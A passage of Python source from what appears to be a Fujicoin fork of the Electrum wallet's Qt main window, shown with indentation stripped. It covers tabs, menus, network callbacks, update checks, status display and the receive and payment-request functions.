tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), False):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, read_QIcon("tab_addresses.png"), _("&Addresses"), "addresses")
add_optional_tab(tabs, self.utxo_tab, read_QIcon("tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, read_QIcon("tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.console_tab, read_QIcon("tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.setCentralWidget(tabs)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(read_QIcon("electrum.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("F5"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'new_transaction', 'status',
'banner', 'verified', 'fee', 'fee_histogram']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
self.network.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
self.new_fx_quotes_signal.connect(self.on_fx_quotes)
self.new_fx_history_signal.connect(self.on_fx_history)
# update fee slider in case we missed the callback
self.fee_slider.update()
self.load_wallet(wallet)
gui_object.timer.timeout.connect(self.timer_actions)
self.fetch_alias()
# If the option hasn't been set yet
if config.get('check_updates') is None:
choice = QMessageBox.question(self,
"Electrum - " + _("Enable update check"),
_("For security reasons we advise that you always use the latest version of Electrum.") + " " +
_("Would you like to be notified when there is a newer version of Electrum available?"),
QMessageBox.Yes,
QMessageBox.No)
config.set_key('check_updates', choice == QMessageBox.Yes, save=True)
if config.get('check_updates', False):
# The references to both the thread and the window need to be stored somewhere
# to prevent GC from getting in our way.
def on_version_received(v):
if UpdateCheck.is_newer(v):
self.update_check_button.setText(_("Update to Electrum {} is available").format(v))
self.update_check_button.clicked.connect(lambda: self.show_update_check(v))
self.update_check_button.show()
self._update_check_thread = UpdateCheckThread(self)
self._update_check_thread.checked.connect(on_version_received)
self._update_check_thread.start()
def on_history(self, b):
self.wallet.clear_coin_price_cache()
self.new_fx_history_signal.emit()
def setup_exception_hook(self):
Exception_Hook(self)
def on_fx_history(self):
self.history_model.refresh('fx_history')
self.address_list.update()
def on_quotes(self, b):
self.new_fx_quotes_signal.emit()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_model.refresh('fx_quotes')
self.address_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide {}") if show else _("Show {}")).format(tab.tab_description)
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self, test_func=None):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
if override and test_func and not test_func(override):
override = None # only override if ok for test_func
return self.top_level_window_recurse(override, test_func)
def diagnostic_name(self):
return "%s/%s" % (PrintError.diagnostic_name(self),
self.wallet.basename() if self.wallet else "None")
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
e = exc_info[1]
if isinstance(e, UserCancelled):
pass
elif isinstance(e, UserFacingException):
self.show_error(str(e))
else:
try:
traceback.print_exception(*exc_info)
except OSError:
pass # see #4418
self.show_error(str(e))
def on_network(self, event, *args):
if event == 'wallet_updated':
wallet = args[0]
if wallet == self.wallet:
self.need_update.set()
elif event == 'network_updated':
self.gui_object.network_updated_signal_obj.network_updated_signal \
.emit(event, args)
self.network_signal.emit('status', None)
elif event == 'blockchain_updated':
# to update number of confirmations in history
self.need_update.set()
elif event == 'new_transaction':
wallet, tx = args
if wallet == self.wallet:
self.tx_notification_queue.put(tx)
elif event in ['status', 'banner', 'verified', 'fee', 'fee_histogram']:
# Handle in GUI thread
self.network_signal.emit(event, args)
else:
self.print_error("unexpected network message:", event, args)
def on_network_qt(self, event, args=None):
# Handle a network message in the GUI thread
if event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
wallet, tx_hash, tx_mined_status = args
if wallet == self.wallet:
self.history_model.update_tx_mined_status(tx_hash, tx_mined_status)
elif event == 'fee':
if self.config.is_dynfee():
self.fee_slider.update()
self.do_update_fee()
elif event == 'fee_histogram':
if self.config.is_dynfee():
self.fee_slider.update()
self.do_update_fee()
self.history_model.on_fee_histogram()
else:
self.print_error("unexpected network_qt signal:", event, args)
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
def close_wallet(self):
if self.wallet:
self.print_error('close_wallet', self.wallet.storage.path)
run_hook('close_wallet', self.wallet)
@profiler
def load_wallet(self, wallet):
wallet.thread = TaskThread(self, self.on_error)
self.update_recently_visited(wallet.storage.path)
self.need_update.set()
# Once GUI has been initialized check if we want to announce something since the callback has been called before the GUI was initialized
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
def init_geometry(self):
winpos = self.wallet.storage.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.print_error("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
name = "Electrum Testnet" if constants.net.TESTNET else "Electrum"
title = '%s %s - %s' % (name, ELECTRUM_VERSION,
self.wallet.basename())
extra = [self.wallet.storage.get('wallet_type', '?')]
if self.wallet.is_watching_only():
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.may_have_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend Fujicoins with it."),
_("Make sure you own the seed phrase or the private keys, before you request Fujicoins to be sent to this wallet.")
])
self.show_warning(msg, title=_('Information'))
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def backup_wallet(self):
path = self.wallet.storage.path
wallet_folder = os.path.dirname(path)
filename, __ = QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder)
if not filename:
return
new_path = os.path.join(wallet_folder, filename)
if new_path != path:
try:
shutil.copy2(path, new_path)
self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created"))
except BaseException as reason:
self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = [path for path in recent if os.path.exists(path)]
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.config.get_wallet_path()))
def new_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename = get_new_wallet_name(wallet_folder)
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save Copy"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("Delete"), self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_master_public_keys)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
addresses_menu = wallet_menu.addMenu(_("&Addresses"))
addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config))
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
history_menu = wallet_menu.addMenu(_("&History"))
history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config))
history_menu.addAction(_("&Summary"), self.history_list.show_summary)
history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog)
history_menu.addAction(_("&Export"), self.history_list.export_history_dialog)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.contact_list.import_contacts())
contacts_menu.addAction(_("Export"), lambda: self.contact_list.export_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.invoice_list.import_invoices())
invoices_menu.addAction(_("Export"), lambda: self.invoice_list.export_invoices())
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.console_tab)
tools_menu = menubar.addMenu(_("&Tools"))
# Settings / Preferences are all reserved keywords in macOS using this as work around
tools_menu.addAction(_("Electrum preferences") if sys.platform == 'darwin' else _("Preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), lambda: self.gui_object.show_network_dialog(self))
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Check for updates"), self.show_update_check)
help_menu.addAction(_("&Official website"), lambda: webbrowser.open("https://www.fujicoin.org"))
help_menu.addSeparator()
help_menu.addAction(_("&Documentation"), lambda: webbrowser.open("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters().host
self.pay_to_URI('fujicoin:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Electrum",
(_("Version")+" %s" % ELECTRUM_VERSION + "\n\n" +
_("Electrum's focus is speed, with low resource usage and simplifying Fujicoin.") + " " +
_("You do not need to perform regular backups, because your wallet can be "
"recovered from a secret phrase that you can memorize or write on paper.") + " " +
_("Startup times are instant because it operates in conjunction with high-performance "
"servers that handle the most complicated parts of the Fujicoin system.") + "\n\n" +
_("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_update_check(self, version=None):
self.gui_object._update_check = UpdateCheck(self, version)
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
"<a href=\"https://github.com/spesmilo/electrum/issues\">https://github.com/spesmilo/electrum/issues</a><br/><br/>",
_("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electrum - " + _("Reporting Bugs"), rich_text=True)
def notify_transactions(self):
if self.tx_notification_queue.qsize() == 0:
return
if not self.wallet.up_to_date:
return # no notifications while syncing
now = time.time()
rate_limit = 20 # seconds
if self.tx_notification_last_time + rate_limit > now:
return
self.tx_notification_last_time = now
self.print_error("Notifying GUI about new transactions")
txns = []
while True:
try:
txns.append(self.tx_notification_queue.get_nowait())
except queue.Empty:
break
# Combine the transactions if there are at least three
if len(txns) >= 3:
total_amount = 0
for tx in txns:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if is_relevant:
total_amount += v
self.notify(_("{} new transactions received: Total amount received in the new transactions {}")
.format(len(txns), self.format_amount_and_units(total_amount)))
else:
for tx in txns:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if is_relevant:
self.notify(_("New transaction received: {}").format(self.format_amount_and_units(v)))
def notify(self, message):
if self.tray:
try:
# this requires Qt 5.9
self.tray.showMessage("Electrum", message, read_QIcon("electrum_dark_icon"), 20000)
except TypeError:
self.tray.showMessage("Electrum", message, QSystemTrayIcon.Information, 20000)
# custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user
def getOpenFileName(self, title, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
fileName, __ = QFileDialog.getOpenFileName(self, title, directory, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def getSaveFileName(self, title, filename, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
path = os.path.join( directory, filename )
fileName, __ = QFileDialog.getSaveFileName(self, title, path, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def timer_actions(self):
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
# update fee
if self.require_fee_update:
self.do_update_fee()
self.require_fee_update = False
self.notify_transactions()
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, self.num_zeros, self.decimal_point, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, amount):
text = self.format_amount(amount) + ' '+ self.base_unit()
x = self.fx.format_amount_and_units(amount) if self.fx else None
if text and x:
text += ' (%s)'%x
return text
def format_fee_rate(self, fee_rate):
return format_fee_satoshis(fee_rate/1000, num_zeros=self.num_zeros) + ' sat/byte'
def get_decimal_point(self):
return self.decimal_point
def base_unit(self):
return decimal_point_to_base_unit_name(self.decimal_point)
def connect_fields(self, window, btc_e, fiat_e, fee_e):
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else Decimal('NaN')
if rate.is_nan() or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
def update_status(self):
if not self.wallet:
return
if self.network is None:
text = _("Offline")
icon = read_QIcon("status_disconnected.png")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
fork_str = "_fork" if len(self.network.get_blockchains())>1 else ""
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
text = _("Synchronizing...")
icon = read_QIcon("status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging ({} blocks)").format(server_lag)
icon = read_QIcon("status_lagging%s.png"%fork_str)
else:
c, u, x = self.wallet.get_balance()
text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = read_QIcon("status_connected%s.png"%fork_str)
else:
icon = read_QIcon("status_connected_proxy%s.png"%fork_str)
else:
if self.network.proxy:
text = "{} ({})".format(_("Not connected"), _("proxy enabled"))
else:
text = _("Not connected")
icon = read_QIcon("status_disconnected.png")
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
self.status_button.setIcon( icon )
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self, wallet=None):
if wallet is None:
wallet = self.wallet
if wallet != self.wallet:
return
self.history_model.refresh('update_tabs')
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.update_completions()
def create_history_tab(self):
self.history_model = HistoryModel(self)
self.history_list = l = HistoryList(self, self.history_model)
self.history_model.set_view(self.history_list)
l.searchable_list = l
toolbar = l.create_toolbar(self.config)
toolbar_shown = self.config.get('show_toolbar_history', False)
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_transaction(self, tx, tx_desc = None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, self, tx_desc)
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_address_e = ButtonsLineEdit()
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
msg = _('Fujicoin address where the payment should be received. Note that each payment request uses a different Fujicoin address.')
self.receive_address_label = HelpLabel(_('Receiving address'), msg)
self.receive_address_e.textChanged.connect(self.update_receive_qr)
self.receive_address_e.setFocusPolicy(Qt.ClickFocus)
grid.addWidget(self.receive_address_label, 0, 0)
grid.addWidget(self.receive_address_e, 0, 1, 1, -1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 1, 0)
grid.addWidget(self.receive_message_e, 1, 1, 1, -1)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 2, 0)
grid.addWidget(self.receive_amount_e, 2, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 2, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.expires_combo = QComboBox()
self.expires_combo.addItems([i[0] for i in expiration_values])
self.expires_combo.setCurrentIndex(3)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding Fujicoin addresses.'),
_('The fujicoin address never expires and will always be part of this electrum wallet.'),
])
grid.addWidget(HelpLabel(_('Request expires'), msg), 3, 0)
grid.addWidget(self.expires_combo, 3, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 3, 1)
self.save_request_button = QPushButton(_('Save'))
self.save_request_button.clicked.connect(self.save_payment_request)
self.new_request_button = QPushButton(_('New'))
self.new_request_button.clicked.connect(self.new_payment_request)
self.receive_qr = QRCodeWidget(fixedSize=200)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.save_request_button)
buttons.addWidget(self.new_request_button)
grid.addLayout(buttons, 4, 1, 1, 2)
self.receive_requests_label = QLabel(_('Requests'))
from .request_list import RequestList
self.request_list = RequestList(self)
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addWidget(self.receive_qr)
w = QWidget()
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_payment_request(self, addr):
self.wallet.remove_payment_request(addr, self.config)
self.request_list.update()
self.clear_receive_tab()
def get_request_URI(self, addr):
req = self.wallet.receive_requests[addr]
message = self.wallet.labels.get(addr, '')
amount = req['amount']
URI = util.create_URI(addr, amount, message)
if req.get('time'):
URI += "&time=%d"%req.get('time')
if req.get('exp'):
URI += "&exp=%d"%req.get('exp')
if req.get('name') and req.get('sig'):
sig = bfh(req.get('sig'))
sig = bitcoin.base_encode(sig, base=58)
URI += "&name=" + req['name'] + "&sig="+sig
return str(URI)
def sign_payment_request(self, addr):
alias = self.config.get('alias')
alias_privkey = None
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = None
if self.wallet.has_keystore_encryption():
password = self.password_dialog(msg)
if not password:
return
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(str(e))
return
else:
return
def save_payment_request(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
if not message and not amount:
self.show_error(_('No message or amount'))
return False
i = self.expires_combo.currentIndex()
expiration = list(map(lambda x: x[1], expiration_values))[i]
req = self.wallet.make_payment_request(addr, amount, message, expiration)
try:
self.wallet.add_payment_request(req, self.config)
except Exception as e:
traceback.print_exc(file=sys.stderr)
self.show_error(_('Error adding payment request') + ':\n' + str(e))
else:
self.sign_payment_request(addr)
self.save_request_button.setEnabled(False)
finally:
self.request_list.update()
self.address_list.update()
def view_and_paste(self, title, msg, data):
dialog = WindowModalDialog(self, title)
vbox = QVBoxLayout()
label = QLabel(msg)
label.setWordWrap(True)
vbox.addWidget(label)
pr_e = ShowQRTextEdit(text=data)
vbox.addWidget(pr_e)
vbox.addLayout(Buttons(CopyCloseButton(pr_e.text, self.app, dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def export_payment_request(self, addr):
r = self.wallet.receive_requests.get(addr)
pr = paymentrequest.serialize_request(r).SerializeToString()
name = r['id'] + '.bip70'
fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70")
if fileName:
with open(fileName, "wb+") as f:
f.write(util.to_bytes(pr))
self.show_message(_("Request saved successfully"))
self.saved = True
def new_payment_request(self):
addr = self.wallet.get_unused_address()
if addr is None:
if not self.wallet.is_deterministic():
msg = [
_('No more addresses in your wallet.'),
_('You are using a non-deterministic wallet, which cannot create new addresses.'),
_('If you want to create new addresses, use a deterministic wallet instead.')
]
self.show_message(' '.join(msg))
return
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
self.set_receive_address(addr)
self.expires_label.hide()
self.expires_combo.show()
self.new_request_button.setEnabled(False)
self.receive_message_e.setFocus(1)
def set_receive_address(self, addr):
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
def clear_receive_tab(self):
try:
addr = self.wallet.get_receiving_address() or ''
except InternalAddressCorruption as e:
self.show_error(str(e))
addr = ''
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
def toggle_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def receive_at(self, addr):
if not bitcoin.is_address(addr):
return
self.show_receive_tab()
self.receive_address_e.setText(addr)
self.new_request_button.setEnabled(True)
def update_receive_qr(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
self.save_request_button.setEnabled((amount is not None) or (message != ""))
uri = util.create_URI(addr, amount, message)
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.qrw.setData(uri)
def set_feerounding_text(self, num_satoshis_added):
self.feerounding_text = (_('Additional {} satoshis are going to be added.')
.format(num_satoshis_added))
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
